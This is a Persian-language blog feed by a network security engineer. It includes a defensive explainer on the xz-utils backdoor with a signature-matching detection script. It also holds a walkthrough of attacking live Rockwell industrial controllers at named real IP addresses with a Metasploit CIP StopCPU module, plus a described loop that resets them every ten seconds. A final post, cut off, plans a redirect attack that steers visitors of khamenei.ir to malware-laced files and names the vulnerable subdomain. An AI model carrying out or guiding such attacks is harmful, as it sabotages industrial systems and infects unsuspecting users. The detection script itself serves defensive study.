https://virgool.io/feed/@ksrvco مهندس امنیت شبکه fa 2026-06-18 02:49:59 https://files.virgool.io/upload/users/21662/avatar/ikfxAX.jpg?height=120&width=120 https://virgool.io/@ksrvco https://virgool.io/@ksrvco/%DA%A9%D8%A7%D9%86%D8%A7%D9%84-%D9%88%DB%8C%D8%AF%DB%8C%D9%88%D9%87%D8%A7%DB%8C-%D9%81%D9%86%DB%8C-%D9%88-%D8%B9%D9%84%D8%A7%D9%82%D9%85%D9%86%D8%AF%DB%8C-%D9%87%D8%A7-cqpluuekygry سلام.در راستای علاقه شخصی و نگهداشتن آرشیوی از چیزهایی که دوست دارم راجب شون صحبت کنم، کانال آپارات و یوتیوب برای این منظور راه اندازی گردیده است و در این پست معرفی میشود.کانال آپارات:آپارات | کافه امنیت | Cafe.Amniyatکانال یوتیوب: Cafe.Amniyat | کافه امنیت - YouTube کیوان رضازاده اقدم کیوان رضازاده اقدم Tue, 06 Jan 2026 18:42:12 +0330 https://virgool.io/@ksrvco/%D8%A8%D8%B1%D8%B1%D8%B3%DB%8C-%D8%AF%D8%B1%D8%A8-%D9%BE%D8%B4%D8%AA%DB%8C-xz-utils-%D8%AF%D8%B1-%D9%84%DB%8C%D9%86%D9%88%DA%A9%D8%B3-ex0vrgsicsnv در این مقاله قصد دارم درباره درب پشتی (Backdoor) که در سرورهای لینوکسی چند روز پیش خبر کشف شدنش منتشر شده بود صحبت کنم و همچنین نظرات خودم را پیرامون این موضوع نیز مطرح کنم.توضیح کلی درباره درب پشتی xz-utils:یک خبری در 28 مارس 2024 منتشر شد که شوکه‌کننده بود و آن هم این خبر بود که سیستم های لینوکسی میزبان یک درب پشتی خطرناک بودند و شناسه CVE-2024-3094 را به خودش اختصاص داد که میتوانست وضعیت وخیمی را برای سرورهای لینوکسی دارای سرویس SSH در کل دنیا ایجاد کند. این خبر به قدری مهم بود که در زمان کوتاهی سر و صدای زیادی ایجاد کرد. یک مهندس نرم افزار در شرکت مایکروسافت بصورت اتفاقی متوجه یک اختلال در سطح شبکه سیستم عامل میشه و با بررسی هایی که در ادامه انجام میده متوجه میشه یک درب پشتی در کتابخانه liblzma که در پکیج xz-utils در نسخه های خاصی وجود دارد در نهایت میتواند منجر به دسترسی به سرویس SSH گردد. در ادامه به جزئیات بیشتر این موضوع خواهیم پرداخت.آشنایی با کتابخانه liblzma:این کتابخانه توسط بسیاری از ابزارها در لینوکس، از جمله OpenSSH، برای فشرده‌سازی داده‌ها استفاده می‌شود. OpenSSH ابزاری برای برقراری ارتباط امن از طریق شبکه است که در همه‌ی سرورهای لینوکس استفاده می‌شود.کتابخانه liblzma در اصل جزو بسته نرم افزاری xz-utils است که هنگام نصب این بسته نرم افزاری ، نصب میشود. درب پشتی در اصل داخل این کتابخانه جاسازی شده بود. این درب پشتی به شیوه ماهرانه‌ای در کتابخانه liblzma قرار داده شده بود و حدود یک ماه بدون اینکه شناسایی بشه ، وجود داشت که باعث آلودگی نسخه های جدید بعضی از توزیع های لینوکسی شده است و این مدت زمان برای شناسایی نشدن درب پشتی یک فاجعه است.عملکرد این درب پشتی به چه صورت است؟کد مخرب درب پشتی در دو نسخه آخر بسته نرم افزاری XZ Utils (نسخه‌های 5.6.0 و 5.6.1) تزریق شده بود. این کد مخرب در حین فرآیند ساخت کتابخانه liblzma، یک فایل آبجکت از پیش ساخته شده را از یک فایل تست مخفی استخراج می‌کند و سپس برای تغییر توابع خاص در کد liblzma استفاده می‌شود. کتابخانه liblzma آلوده می‌تواند توسط هر نرم‌افزاری که به آن لینک شده است و از این کتابخانه بهره میبرد، مورد استفاده قرار بگیرد. این کتابخانه می‌تواند تعاملات داده‌ای با این کتابخانه را رهگیری و تغییر دهد و همچنین مهاجم (شخصی که اقدام به ایجاد درب پشتی کرده است) از یک کلید RSA خصوصی برای ایجاد تعامل با درب پشتی استفاده میکند تا بتواند به اهداف مختلف متصل شود.این درب پشتی چگونه شناسایی شده است؟جالب است این درب پشتی پس از یک ماه فعالیت خود ، بصورت اتفاقی شناسایی شده است. یک مهندس نرم افزار در مایکروسافت در حال کار برروی نسخه ناپایدار و ادج توزیع دبیان بوده است که به اصطلاح به این نسخه‌ها ، نسخه های Testing میگویند. این مهندس نرم افزار بصورت اتفاقی متوجه میشود که هنگام برقراری اتصال به سرویس SSH تغییراتی در میزان لود CPU و تاخیر زمانی 500 میلی ثانیه اتفاق میفتد.این تغییرات اونقدر کوچک هستند که کمتر کسی میتواند به این موضوع مشکوک شود و تقریبا همه افراد اینچنین موضوعات را به پای اختلالات اینترنتی و شبکه و ... میگذارند اما این مهندس نرم افزار شرکت مایکروسافت موضوع را پیگیری کرده و متوجه میشود یک درب پشتی در کتابخانه liblzma بسته نرم افزاری xz-utils وجود دارد. این مهندس نرم افزار باتوجه به احتمالاتی که میدهد اقدام به بررسی اجزای مختلف تشکیل دهنده سرویس SSH میکند و همچنین توزیع دبیان Testing را نیز مورد بررسی قرار میدهد چرا که این مشکل میتوانست از منشا خوده توزیع دبیان و یا کرنل لینوکس قرار گرفته برروی آن باشد.در نهایت با مقایسه بسته های نرم افزاری اجزای تشکیل دهنده سرویس SSH در نسخه Testing و Stable دبیان متوجه میشوند که کتابخانه liblzma در بسته نرم افزاری xz-utils دارای درب پشتی است. همچنین قابل ذکر است نسخه های جدید بسته نرم افزاری xz-utils که در واقع نسخه های 5.6.0 و 5.6.1 هستند این مشکل را دارند و بدلیل اینکه این نسخه ها هنوز وارد مخازن نسخه های Stable دبیان نشده بودند خوشبختانه فقط نسخه های Testing آلوده شده بودند. همچنین میتوان نتیجه گرفت این مشکل به توزیع دبیان مربوط نمیشود بلکه تمامی توزیع های لینوکسی که از بسته نرم افزاری xz-utils نسخه های 5.6.0 و 5.6.1 استفاده میکردند دارای این درب پشتی هستند که لیست آن توزیع ها را میتوانید مشاهده کنید:اجزای تشکیل دهنده OpenSSH چه چیزهایی است؟علاوه بر ux-utils که به آن اشاره کردیم و گفتیم که یکی از اجزای تشکیل دهنده سرویس OpenSSH است ، اجزای دیگر آن عبارتند از آیتم sshd که در واقع daemon برای سرویس SSH است که به اتصالات ورودی گوش میدهد و آنها را مدیریت میکند. آیتم ssh-keygen که برای ایجاد و مدیریت کلیدهای SSH استفاده می‌شود. آیتم ssh-copy-id که برای کپی کردن کلیدهای SSH به سرورهای دیگر استفاده می‌شود. آیتم openssl که برای رمزنگاری برای رمزنگاری ترافیک SSH استفاده می‌شود. آیتم PAM که برای احراز هویت کاربران SSH استفاده می‌شود.هویت شخصی که درب پشتی را ایجاد کرده بود:همه از سراسر دنیا حتی با وجود هرنوع وابستگی و عدم وابستگی به سرویس‌های جاسوسی دولت‌ها میتوانند در پروژه‌های متن باز (Open Source) نظیر لینوکس مشارکت داشته باشند و نقطه ضعف شدیدی که اینجا وجود دارد اینست که این افراد نیاز به وریفای و تایید هویت ندارند. شخص یا اشخاصی که این درب پشتی را در بسته نرم افزاری xz-utils قرار داده بودند مدت زمان 2 سال در کامیونیتی متن باز فعالیت داشتند و افراد جدیدی نبودند که امروز اکانت ایجاد کنند و فردا درب پشتی را وارد مخازن کنند. بنابراین این شخص یا اشخاص در حال حاضر مشخص نیست چه کسانی هستند چرا که تنها چیزی که از آن/آنها در دست است یک نام و یک آدرس ایمیل و یک کلید هستش که هیچکدوم از این موارد هویت یک شخص را مشخص نمیکنند. اما با توجه به پیچیدگی سناریوی بارگذاری درب پشتی و زمانی که برای جلب اعتماد کامیونیتی صرف شده است، افراد مختلفی معتقدن که اینکار میتواند توسط یک دولت انجام شده باشد که البته دور از منطق هم نیست و میتواند استنباط درستی باشد.نکات امنیتی:بعد از اینکه با عملکرد درب پشتی فوق آشنا شدیم میخوام در این قسمت پایانی یکسری مواردی رو مطرح کنم که میتوان از نتایج اینچنین تحقیقات امنیتی برداشت کرد و همچنین نظرات متخصصین امنیت و مدیران سیستم نیز بوده است که جا داره بیشتر به این موارد دقت شود. این موارد رو بصورت عناوین کوتاه در ادامه مطرح میکنم که درک آنها نیز ساده‌تر باشد: اولین پارامتر در تامین امنیت و امن نگهداشتن یک سیستم اینست که تا حد امکان بصورت Minimal استفاده شود.هرچقدر سیستم سبک‌تر باشد دامنه آسیب پذیری های آن نیز کمتر است و بازدهی سیستم نیز بالاتر است.این تفکر اشتباه است که چون پروژه های متن باز در دسترس عموم هستند بنابراین باگ هاش سریع‌تر برطرف میشوند و امنیت بالاتری دارند. اینکه باگ هاش سریع تر برطرف میشوند تفکر درستی است اما پروژه های متن باز الزاما دارای امنیت بالایی نیستند و این موضوع در ابعاد مختلف میتواند بررسی شود. همانطور که رفع شدن باگ های پروژه های متن باز میتواند سریع‌تر اتفاق بیفتد در مقابل نیز آلوده کردن آنها توسط طیف گسترده‌ای از افراد نیز میتواند با زحمت نه چندان زیادی انجام شود. پس راه چاره چیست؟بروز بودن سیستم عامل و بسته های نرم افزاری در دنیای لینوکس نباید با عجله و شور و ذوق همراه باشد. درب پشتی زیر میتواند نمونه واضح برای مثال این موضوع باشد که پایداری و امن نگهداشتن بسته های نرم افزاری اهمیت بالاتری نسبت به بروز بودن آنها دارد بخصوص در محیط‌های پروداکشن.سرویس های مهم یک سرور ترجیحا نباید در معرض عموم باشند (هرچند دارای مکانیزم های احرازهویت باشند). بازهم درب پشتی فوق میتواند مثال خوبی برای این موضوع باشد چرا که اگر سرویس SSH سرور شما پشت یک فایروال باشد و یا دسترسی محدودی برای یکسری شبکه های خاص داشته باشد مهاجم قادر به برقراری ارتباط با سرور آلوده شده نخواهد بود.بحث های مربوط به هاردنینگ و امن سازی در سیستم‌ها و سامانه های لینوکسی بسیار بسیار دارای اهمیت بالایی هستند چرا که این سیستم ها ذاتا امنیت کافی ندارند. امن سازی این سیستم ها نباید بصورت یک مرحله و یکباره اتفاق بیفتد و بعدش رها شود. این سیستمها نیاز بیشتری دارند تا مانیتورینگ امنیتی شوند و امن نگهداشته شوند. هرکدام از این موضوعات بحث های طولانی و جداگانه دارد.و کلی نکات دیگری که بایستی هنگام استقرار یک سیستم و بکارگیری آن در محیط پروداکشن بایستی مورد توجه واقع شوند.تشخیص سیستم آلوده به این درب پشتی:برای اینکه مطمئن بشیم سرور و یا سیستم ما به این درب پشتی آلوده نشده است خوشبختانه به راحتی میتوان این بررسی را انجام داد و فقط کافیست با کانسپت کلی عملکرد این درب پشتی آشنایی داشته باشیم. برای نمونه میتوان از اسکریپت Bash زیر استفاده کرد:#! /bin/bash set -eu # find path to liblzma used by sshd path=&quot$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')&quot # does it even exist? if [ &quot$path&quot == &quot&quot ] then echo probably not vulnerable exit fi # check for function signature if hexdump -ve '1/1 &quot%.2x&quot' &quot$path&quot | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410 then echo probably vulnerable else echo probably not vulnerable fi exitاین اسکریپت ابتدا میاد مسیر کتابخانه liblzma را که توسط سرویس ssh استفاده میشود را پیدا میکند و سپس با استفاده از hexdump برای نمایش محتوای hexadecimal فایل liblzma استفاده میکند و به دنبال یک hexadecimal خاص مرتبط با این درب پشتی میگردد و در نهایت بر اساس نتایج موجود میتواند اعلام کند که سیستم و یا سرور ما به این درب پشتی آلوده شده است یا خیر.منابع:NVD - CVE-2024-3094 (nist.gov)Threat Brief: XZ Utils Vulnerability (CVE-2024-3094) (paloaltonetworks.com)CVE-2024-3094: malicious code in Linux distributions | Kaspersky official blogCVE-2024-3094 (debian.org)CVE-2024-3094 | Ubuntuaccess.redhat.com/security/cve/CVE-2024-3094Disclosed backdoor in xz releases - FreeBSD not affected کیوان رضازاده اقدم کیوان رضازاده اقدم Mon, 01 Apr 2024 20:43:46 +0330 https://virgool.io/@ksrvco/%D8%A7%DB%8C%D8%AC%D8%A7%D8%AF-%D9%85%D8%AD%D8%AF%D9%88%D8%AF%DB%8C%D8%AA-%D8%A7%D8%B3%D8%AA%D9%81%D8%A7%D8%AF%D9%87-%D8%A7%D8%B2-%D9%85%D9%86%D8%A7%D8%A8%D8%B9-memory-%D9%88-cpu-%D8%A8%D8%B1%D8%A7%DB%8C-%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%D9%87%D8%A7-%D8%AF%D8%B1-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-%D8%B3%D8%B1%D9%88%D8%B1-dedcwpjslo82 ایجاد محدودیت استفاده از منابع مموری و پردازنده سرور توسط سرویس ها و پراسس های مختلف یکی از مهم ترین موضوعات امن سازی (hardenning) سرورها هست.دلایل امنیتی که میتوان برای انجام آن درنظر گرفت میتوان به موارد زیر اشاره کرد:محافظت از منابع سرور: با اعمال محدودیت بر میزان منابعی که هر پروسه یا سرویس می‌تواند استفاده کند، می‌توان از مصرف بیش از حد منابع توسط یک پروسه یا سرویس مخرب جلوگیری کرد. این امر به حفظ عملکرد و پایداری سرور کمک می‌کند.مقابله با حملات DoS: این حملات معمولاً با ارسال حجم زیادی از درخواست‌های جعلی به یک سرور انجام می‌شوند. با اعمال محدودیت بر میزان منابعی که یک پروسه یا سرویس می‌تواند استفاده کند، می‌توان از این حملات در سمت سرور جلوگیری کرد.شناسایی فعالیت‌های مشکوک: اگر یک پروسه یا سرویس شروع به استفاده بیش از حد از منابع سیستم کند میتواند نشان از فعالیت مخرب باشد که اگر بررسی نشود کلیه منابع سیستم میتواند درگیر شود و سیستم از دسترس خارج شود.وقتی صحبت از هاردنینگ امنیتی میشود متاسفانه اکثرا بسنده میکنند به چک لیست های عمومی درحالیکه اونا تمام ماجرا نیستند. هاردنینگ موفق به این معناست که در کنار چک لیست های مطرح که وجود دارد روش های متعدد دیگری نیز با محوریت امنیت و با توجه به شرایط نگهداری سرویس و نیازهای سازمان برروی آن پیاده سازی شوند.محدودسازی میزان مصرف منابع سیستم توسط سرویس ها و پراسس های مختلف در لینوکس به کمک کرنل به راحتی قابل انجام است و تکنولوژی هایی نظیر داکر نیز از این شیوه استفاده میکنند. اما در این ویندوز سرور این بحث نادیده گرفته شده است درحالیکه باتوجه به اینکه اکثریت سرورهای سازمانی در حیطه مایکروسافت ویندوز سرور هستند بنابراین توجه به این مقوله مهم میتواند تاثیر زیادی در فرآیند هاردنینگ سرور داشته باشد.در این ویدیو دمو که لینک آن را قرار میدهم ابزار Process Governor رو معرفی میکنیم و یک دمو از آن را بصورت عملی بررسی میکنیم.این ابزار باید تحت فرآیند درستی بکارگیری شود وگرنه موثر نخواهد بود. بعنوان مثال میتوان این ابزار را تحت سرویس در سیستم عاملی اجرا کرد و همچنین با سولوشنی نظیر WatchDog عملکرد آن را ادغام کرد تا خروجی مطلوب تری در سناریوهای عملیاتی بتوانیم داشته باشیم.https://www.aparat.com/v/2dSEs کیوان رضازاده اقدم کیوان رضازاده اقدم Thu, 07 Dec 2023 21:57:06 +0330 https://virgool.io/@ksrvco/%D8%AA%D8%B4%D8%B1%DB%8C%D8%AD-%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D8%AA%D8%AC%D9%87%DB%8C%D8%B2%D8%A7%D8%AA-%DA%A9%D9%86%D8%AA%D8%B1%D9%84-%D8%B5%D9%86%D8%B9%D8%AA%DB%8C-rockwell-oefpxroa3fkp RockWell Companyچندین ماه پیش روی یک پروژه ای کار میکردم که درخصوص امنیت تجهیزات کنترل صنعتی کمپانی RockWell بود و در نهایت گزارشی از اون پروژه تهیه کرده بودم. اکنون قصد دارم گزارش را در این مقاله نشر بدهم چرا که خالی از لطف نیست و امیدوارم عزیزانی که علاقه مند هستند براشون مفید واقع بشه.آشنایی کوتاه با کمپانی RockWell :اطلاعات کوتاهی درباره کمپانی RockWell به شرح زیر است :که از ویکی پدیا نیز میتوانید در مورد این کمپانی اطلاعاتی بدست آورید : https://en.wikipedia.org/wiki/Rockwell_Automation شرح کلی آسیب پذیری :این بررسی امنیتی روی ۳ مدل از تجهیزات کنترل صنعتی این کمپانی صورت گرفته است که به شرح زیر هستند :1769-L23E-QBFC1 1769-L32E 1769-L23E-QB1آسیب پذیری که این ۳ مدل از تجهیزات کنترل صنعتی RockWell از آن رنج میبرند مربوط به دسته آسیب پذیری های Local And Remote بوده و این توانایی را به شخص نفوذگر میدهد تا اقدام به Reset کردن تجهیزات دارای آسیب پذیری نماید.این تجهیزات ساخت کمپانی RockWell بیشتر در صنایع آب و برق و گاز به منظور اتوماسیون صنعتی مورد استفاده قرار میگیرند و تا جاییکه من دستگاه های آسیب پذیر را مورد بررسی قرار داده بودم این تجهیزات دارای آسیب پذیری در ایران مورد استفاده قرار نمیگیرند.این احتمال وجود دارد که مدل های دیگر از تجهیزات این کمپانی دارای اینچنین آسیب پذیری باشند و روشن شدن این موضوع نیاز به بررسی مدل های مختلف این تجهیزات دارد.این آسیب پذیری امنیتی میتواند بصورت برنامه ریزی شده نیز عملیاتی شود. بعنوان مثال میتوان برای این آسیب پذیری Auto Exploiter تولید کرد که روی تجهیزات آسیب پذیر بصورت اتوماتیک در یک بازه زمانی مشخص حملات خود را مبنی بر Reset کردن آن اتوماسیون انجام دهد و انجام اینکار بصورت مداوم باعث از کار افتادن اتوماسیون خواهد شد.نکته قابل توجه درباره این آسیب پذیری آن است که این آسیب پذیری نیازی به دسترسی بصورت تحت وب به اتوماسیون آسیب پذیر را نداشته و صرفا حمله از طریق پورت مربوط به این تجهیزات یعنی در واقع از طریق پورت 44818 انجام میگیرد و این پورت یک شماره پورت UDP بوده و مختص این تجهیزات میباشد.اما در صورتیکه هدف مقابل دارای دسترسی از طریق Web نیز داشته باشد در اینصورت این امکان فراهم میشود که لحظه Uptime سرور مقابل قابل رویت باشد.در زمان بررسی و انجام این پروژه نمونه ای از این اهداف مربوط به این آسیب پذیری مربوط به دانشگاه KanSas آمریکا بود که با این آسیب پذیری امکان Reset اتوماسیون مورد استفاده در آنجا فراهم میشده است. آسیب پذیری باتوجه به اینکه با زندگی بشر ارتباط مستقیم دارد بنابراین امکان برطرف شدن این آسیب پذیری بیشتر بوده و در حال حاضر نیز است.حمله و عمل Exploitation چگونه اتفاق میفتد؟در این قسمت قصد دارم به این موضوع بپردازم که چگونه این حمله روی یک سیستم اتفاق میفتد و سیستم مقابل میتواند اکسپلویت شود؟بعنوان مثال آدرس آیپی 129.130.21.141 بعنوان هدف ما در این تست نفوذ جهت نتیجه گیری کلی است و همچنین قابل ذکر است که این آدرس یکی از سرورهای دانشگاه KanSas میباشد. در زمانی که روی این پروژه کار میکردم گزارش را بر مبنای همین سرور از دانشگاه Kansas تهیه میکردم بنابراین در این مقاله نیز روی این سرور توضیحات لازم را مطرح خواهیم کرد. برای انجام تست نفوذ و نتیجه گیری درمورد آن قبل از هرچیزی این موضوع بسیار روشن و واضح است که هر سرویسی در سمت سرور از یک Port Number استفاده میکند و سرویس میتواند دارای آسیب پذیری باشد که معمولا با Upgrade این مشکل برطرف میشود. به منظور اکسپلویت هدف مقابل اولین قدم دریافت اطلاعاتی درخصوص پورت های فعال هدف مقابل است که خروجی را خواهیم داشت :اما همانطور که قابل مشاهده است خروجی من بسیار ناچیز و نتیجه مطلوبی را نیز دربر ندارد و طبق این نتیجه گیری Service Scanning متوجه میشویم که سرور مقابل تقریبا تمام سرویس های خود را بصورت ریموت در فایروال Filter کرده و در حقیقت غیرقابل استفاده است و تنها ارتباط تحت وب از طریق پورت شماره 80 و پروتکل HTTP ممکن است.برای تست نفوذ این تجهیزات کمپانی RockWell پروتکلی که ما دنبالش هستیم بصورت Undetected در مرحله اول وجود دارد و برای ما در خروجی نمایش داده نمیشود. اینبار فقط پورت مربوط به این تجهیزات را که 44818 است اسکن میکنیم که خروجی به صورت زیر است :همانطور که مشاهده میکنید نتیجه مثبتی دریافت کردم و مشخص میکند که پورت و سرویسی که به دنبال آن هستیم در سرور فعال میباشد.باتوجه به اینکه سرویس هایی نظیر ftp , ssh روی سرور وجود دارند اما بدلیل اینکه بصورت Remote برای ما فیلتر شده اند بنابراین قابل استفاده نیستند. تا اینجای کار ما توانستیم اطلاعاتی درخصوص سرویس مورد نظر روی هدف مان بدست آوریم. در گام بعدی برای کسب یکسری اطلاعات دیگر میتوانیم از پورت ۸۰ استفاده کرده و بصورت تحت وب پنل اتوماسیون را مشاهده کنیم.در این قسمت یکسری اطلاعات قابل مشاهده است بعنوان مثال مدل سیستم اتوماسیون که درحال حاضر سرویس میدهد قابل مشاهده است. با این مشخصات اگر سیستم هدف ما اکسپلویت شد متوجه میشویم که تمامی تجهیزات مرتبط با این مدل قابل اکسپلویت شدن هستند مگر آنکه آسیب پذیری آنها برطرف شده باشد و یا یکسری اقدامات Spoofed Info روی تجهیزات انجام شده باشد.همچنین قابل مشاهده است که Uptime سیستم مربوط به چند روز (یا حتی چند ماه) قبل میباشد.نکته مهمی در اینجا مطرح میشود در صورتیکه هدف ما از طریق تحت وب قابل دسترسی نباشد از چه روشی میتوان مدل مربوط به اتوماسیون را تشخیص داد؟ در این صورت میتوان از موتور Shodan استفاده کرد که بعنوان مثال برای این هدف ما خروجی به شرح زیر است :فریمورک Msfconsole یک اکسپلویتی تحت عنوان multi_cip_command دارد که قابل پیاده سازی روی این مدل تجهیزات آسیب پذیر میباشد و میتوان از آن اکسپلویت در راستای پیاده سازی حمله روی این تجهیزات استفاده کرد.این اکسپلویت به زبان Ruby نوشته شده است و در محیط فریمورک msf قابل بهره برداری میباشد. برای مورد هدف قرار دادن یک آدرس با این فایل اکسپلویت ۳ گزینه برای اینکار نیاز است تا تنظیم شود :همانطور که مشاهده میکنید آپشنی وجود دارد برای تعیین IP Addr سیستم مقابل و آپشنی وجود دارد برای تعیین Port Num سیستم مقابل و همچنین آپشن ATTACK نیز وجود دارد که نوع حمله را مشخص میکند. حملاتی که تحت این آسیب پذیری قابل انجام هستند :StopCPU CrashCPU CrashEther ResetEtherنفوذگر میتواند به اختیار نوع حمله را انتخاب کند که من حمله StopCPU را انتخاب میکنم و این حمله باعث میشود تا CPU سیستم مقابل متوقف شود و سیستم مجدد راه اندازی شود. پس از تعیین موارد موردنیاز اقدام به اکسپلویت میکنیم :نکته : آدرس آیپی موجود در اسکرین شات مربوط به KanSas نیست اما بررسی های بالا مربوط به Kansas بوده است.اکنون جهت اطمینان از موفقیت آمیز بودن اکسپلویت بصورت تحت وب تارگت را باز میکنیم و خواهیم داشت :اکنون با چک کردن وضعیت Uptime میتوان متوجه شد که اکسپلویت با موفقیت انجام شده است.چگونه حملات به تجهیزات آسیب پذیر را بصورت مداوم و پشت سرهم انجام دهیم‌؟برای انجام اینکار ما نیاز داریم که ابزاری برای این منظور کدنویسی کنیم.این ابزار میتواند با اهداف مختلف و با توجه به نیازهای ما کدنویسی شود. من به منظور تست و آزمایش یک ابزار ساده با Bash کدنویسی کردم که این ابزار در هر ۱۰ ثانیه اقدام به اجرای این اکسپلویت میکند و باعث میشود هدف مقابل ما در هر ۱۰ ثانیه یکبار Reset شود بنابراین اینکار باعث میشود وضعیت اتوماسیون هدف مقابل تقریبا از کار بیفتد و کارکرد آن مختل شود.کارکرد این ابزار صرفا نیازمند اینست که فریمورک msf روی سیستم ما وجود داشته باشد.تجهیزات بسیاری از این مدل های مذکور دارای آسیب پذیری هستند که از طریق Shodan قابل دستیابی می باشند.نکته : یک ویدیو دمو از انجام این حمله روی یک سرور به آدرس آیپی 166.130.4.33 قرار میدهم که میتوانید مشاهده کنید. قابل ذکر است ویدیو دمویی که مربوط به انجام این حمله روی سرور KanSas داشتم متاسفانه در حال حاضر در دسترس نیست وگرنه همان را در اینجا قرار میدادم.امیدوارم مفید واقع شده باشد. کیوان رضازاده اقدم کیوان رضازاده اقدم Sun, 19 Apr 2020 13:43:28 +0430 https://virgool.io/@ksrvco/%D8%AA%D8%B4%D8%B1%DB%8C%D8%AD-%D9%86%D8%AD%D9%88%D9%87-%D8%AD%D9%85%D9%84%D9%87-%D8%A8%D9%87-%D8%A8%D8%A7%D8%B2%D8%AF%DB%8C%D8%AF%DA%A9%D9%86%D9%86%D8%AF%D9%87-%D9%87%D8%A7%DB%8C-%D9%88%D8%A8%D8%B3%D8%A7%DB%8C%D8%AA-%D8%AF%D9%81%D8%AA%D8%B1-%D8%AD%D9%81%D8%B8-%D9%88-%D9%86%D8%B4%D8%B1-%D8%A2%D8%AB%D8%A7%D8%B1-%D9%85%D9%82%D8%A7%D9%85-%D9%85%D8%B9%D8%B8%D9%85-%D8%B1%D9%87%D8%A8%D8%B1%DB%8C-cob82vvlhufj در این مقاله میخواهیم به یک موضوعی بپردازیم تحت عنوان اینکه چطور میتوان به بازدیدکننده های وبسایت حضرت آقا حمله سایبری انجام داد و در ادامه تمام مواردی که نیاز هست رو توضیح خواهیم داد. وبسایت حفظ و نشر آثار حضرت آقا به آدرس khamenei.ir میباشد که دارای Subdomain های مختلف برای زبان های متفاوت هست و کاربران فارسی زبان و انگلیسی زبان و حتی عربی زبان میتوانند به هرکدوم از Subdomain ها منتقل شوند و از مطالب وبسایت بهره مند شوند.چرا در این مقاله روی موضوع حمله به کاربران بازدیدکننده بحث میکنیم؟وبسایت مذکور یک وبسایت خبری و اطلاع رسانی هست و تفاوت مهمی با وبسایتی دارد که سرویس های متفاوت روی آن درحال اجراست و به شبکه داخلی وصل هست. وبسایت ها بطور کلی به دو دسته تقسیم بندی میشوند : الف) وبسایت های خبری و اطلاع رسانیب) وبسایت هایی که سرویس های متفاوتی را پشتیبانی میکنند و به شبکه داخلی ای وصل هستند.همچنین آسیب پذیری های ما به دو دسته کلی تقسیم بندی میشوند :الف) آسیب پذیری های Server Sideب) آسیب پذیری های Client Sideوبسایت هایی که جزو گروه ؛الف؛ هستند به دلیل اینکه جنبه اطلاع رسانی و خبری دارند بنابراین حملاتی که برای این نوع وبسایت ها مهم هستند حملات مبتنی بر آسیب پذیری های گروه ؛ب؛ هستند. البته شاید بتوان گفت میتوان این سایت ها را به اصطلاح Deface کرد اما deface کردن در برهه زمانی فعلی اهمیت چندانی ندارد و همچنین بحث ما روی موضوع نفوذ و سوءاستفاده هست که دیفیس با این اهداف هم راستا نخواهد بود. امروزه کمتر وبسایتی در دنیای سایبر وجود دارد که هم وبسایت خبری و جنبه اطلاع رسانی باشد و هم به یک شبکه داخلی متصل باشد و یا سرویس های متفاوتی را اجرا و سرویس دهی کند.هرچند سرور وبسایت میتواند مورد سوءاستفاده قرار بگیرد.وبسایت های گروه ؛ب؛ نوع دیگری از وبسایت ها هستند که سرویس های متفاوت را ساپورت میکنند. بعنوان مثال وبسایتی وجود دارد که به یک دیتابیسی متصل هست و حتی برخی سرویس های مرتبط با شبکه داخلی را نیز ساپورت میکند.حملاتی که برای اینچنین وبسایت ها مهم و قابل توجه هستند حملات گروه ؛الف؛ هستند. نفوذگر با بررسی سرویس ها و روش های مختلف در ابعاد گوناگونی سعی خواهد داشت از سرور هدف کسب دسترسی کرده و حتی به شبکه داخلی متصل شود. در اینحالت پیاده سازی حملات تحت کلاینت برای اینچنین وبسایت ها شایع نیست و کم اهمیت است.وبسایت حفظ و نشر آثار حضرت آقا جزو کدام وبسایت ها هست؟وبسایت حضرت آقا را اگر بازدید کرده و مورد بررسی قرار دهید این نتیجه گیری ایجاد خواهد شد که وبسایت مذکور یک وبسایت با جنبه اطلاع رسانی هست. بنابراین ما روی موضوع نفوذ به بازدیدکننده های وبسایت تمرکز خواهیم کرد و در انتها بصورت مختصر به آسیب پذیری سمت سرور نیز اشاره ای خواهیم داشت.رتبه و رنک وبسایت چگونه است؟اکنون کمی رنک و رتبه وبسایت را مورد تحلیل قرار میدهیم.همانطور که در تصویر پایین مشاهده میکنید کاربران وبسایت با استفاده از Keyword های همانند کلیدواژ های زیر به وبسایت khamenei.ir مراجعه میکنند :چند وبسایت هم راستا با وبسایت حفظ نشر و آثار مقام معظم رهبری نیز وجود دارد که به شرح زیر هستند :در حال حاضر بطور جامع کاربران بازدیدکننده وبسایت از کشورهای ایران و ایالات متحده آمریکا هستند که جزییات آن مطابق با تصویر زیر هست :همانطور که مشاهده میکنید ۹۴٫۳ درصد از بازدیدکننده ها ایرانی هستند و ۳٫۶ درصد نیز کاربران آمریکایی را تشکیل میدهند. رتبه وبسایت در دو کشور ایران و آمریکا نیز به شرح زیر هست :توضیحات جامع برای نفوذ به بازدیدکننده های وبسایت :باتوجه به ماهیت وبسایت و همچنین با توجه به اینکه اکثریت کاربران وبسایت را کاربران ایرانی تشکیل میدهند بنابراین وجود یک آسیب پذیری در وبسایت میتواند زمینه را فراهم بکند تا حملاتی سازماندهی شده علیه کاربران پیاده سازی شود.یک آسیب پذیری در پورتال کشف شده است که ما قصد داریم در ادامه در مورد آن بحث کنیم.در خصوص کاربران بازدیدکننده میتوان تحلیل هایی داشت. بعنوان مثال میتوان این احتمال را بصورت قوی مطرح کرد که با توجه به ماهیت و زمینه فعالیتی وبسایت این احتمال بصورت قوی وجود دارد که عمده بازدیدکننده های وبسایت کاربران انقلابی و مقید به ارزش های انقلاب و رهبری و اعتقادی هستند بنابراین با این حساب طیف افراد مشخص است و زمینه برای نفوذ نیز مشخص است در نتیجه میتوان بصورت ساده تر حملاتی را سازماندهی کرد.آسیب پذیری که در سایت وجود دارد URL Injection هست و این امکان را به نفوذگر میدهد تا بتواند کاربر را بدون ایجاد کوچک ترین شک و تردید به آدرس دیگری هدایت بکند.بعنوان مثال میتوان استفتائات حضرت آقا را به یک بدافزار آلوده کرد و سپس برروی یک سرور دیگری قرار داد و از طریق این آسیب پذیری کاربران بازدیدکننده را به سمت این استفتائات آلوده شده هدایت کرد. دوستانی که در حوزه امنیت سایبری فعالیت دارند بهتر میتوانند این موارد را درک کنند.سابدامین آسیب پذیر وبسایت بصورت زیر هست :farsi.khamenei.irهمچنین URL آسیب پذیر را به اینصورت داریم 